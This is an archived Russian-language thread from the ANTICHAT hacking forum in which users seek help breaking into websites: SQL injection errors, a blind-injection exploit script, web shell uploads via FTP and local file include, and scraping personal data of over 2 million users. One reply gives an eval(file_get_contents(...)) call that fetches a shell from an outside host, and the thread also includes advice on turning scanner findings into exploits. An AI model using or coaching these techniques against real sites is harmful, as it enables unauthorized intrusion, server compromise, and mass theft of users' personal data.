ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.12.2010, 18:13
|
|
Познающий
Регистрация: 23.12.2008
Сообщений: 81
Провел на форуме:
460763
Репутация:
97
|
|
На сайте есть скуль, через order by смотрю сколько полей их 3!
Через union+select подставляю 1,2,3--
выдает такой вот текст:
Query failed: The used SELECT statements have a different number of columns
как такое может быть и как это обойти?
|
|
|
16.12.2010, 18:20
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от I love this game
I love this game said:
На сайте есть скуль, через order by смотрю сколько полей их 3!
Через union+select подставляю 1,2,3--
выдает такой вот текст:
Query failed: The used SELECT statements have a different number of columns
как такое может быть и как это обойти?
Может переменная в несколько запросов подставляется,крути как слепую.
|
|
|
|
16.12.2010, 19:04
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Короче, хочу разобраться в написание скрипта эксплатирующего blind sql inj
методом " Бинарный (двоичный) поиск нужного символа"
токо я не допонимаю как написать реализацию (тут не оч. понтяно /showpost.php?p=1258161&postcount=1)
дайте плиз ссыль на наглядный пример того метода
|
|
|
|
16.12.2010, 20:04
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
там как раз таки довольно хорошо написано, ну а если ты разобраться не можешь то о каком скрипте может быть речь?
|
|
|
|
16.12.2010, 21:02
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Сообщение от ALIM
ALIM said:
захожу на сайт:
ftp://xxxxxxxxxx.se
там 2 файла:
.bashrc
.bash_profile
в которых ничего особенного нет, выше не поднимается, других файлов и папок нет
создаю папку с правами 777, шелл заливается
ftp://xxxxxxxxxx.se/1/test.php не выполняется открывается как текстовый файл
http://xxxxxxxxx.se/1/test.php
нет такого файла
Есть ли тут возможность заливки шелла?
Твой ФТП, скорей всего, недоступен из веба да и все.
Единственный путь- это найти на самом сайте локальный инклюд и найти, куда ты льешь шелл и заинклюдить его. Скинь лучше линк на сайт в теме.
|
|
|
|
17.12.2010, 05:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Вопрос
http://localhost/xxx.php?p=1 профиль первого юзера
http://localhost/xxx.php?p=2 профиль второго юзера
и т.д.
В профиле указан город, мыло, имя, пол и т.д.
юзеров более 2 млн. Как спарсить на автомате инфу обо всех юзерах?
Чтобы дамп был вида:
мыло, пол, город
мыло, пол, город
мыло, пол, город
Буду рад любой помощи.
|
|
|
|
17.12.2010, 10:36
|
|
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
Залил веб шелл, пробую обратиться к нему - получаю пустую страницу (то что он по этому адресу - 100%). Простейшие же php файлы типа исполняются нормально. Что бы это могло быть?
|
|
|
|
17.12.2010, 14:31
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
iv.
Без линка причину тебе врятле скажут сразу же,могут быть только догадки.А то что он залился,это не факт,то что исполняется один код ето хорошо.
Попробуй сделать следующее:
Попробуй вставить в шаблон (или куда ты там впихиваешь пхп код) следующий код:
Затем проверь:
site.com/shablon.php?e=phpinfo();
Если все окей и директива url_fopen = on то:
site.com/shablon.php?e=eval(file_get_contents('http://tvoisite.com/shelleng.txt'));
Убери только из шелленга и залей на какой-нибудь фрихост с расширением тхт,пароль также советую убрать,т.к. шелл не заливается на сервак.
|
|
|
|
17.12.2010, 15:22
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от iv.
iv. said:
Залил веб шелл, пробую обратиться к нему - получаю пустую страницу (то что он по этому адресу - 100%). Простейшие же php файлы типа исполняются нормально. Что бы это могло быть?
Шелл, наверное, загзипован, а на сервере не стоит это расширение. Попробуй другой шелл, без gzinflate() или распакуй его.
|
|
|
|
17.12.2010, 17:42
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Кто может подсказать как из Acunetix Web Vulnerability Scanner снимать найденные уязвимости? сайт сканирован, нашел несколько SQL иньексии, но не показывает URL:
вот не понимаю как отсюда эксплуатировать это делол. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
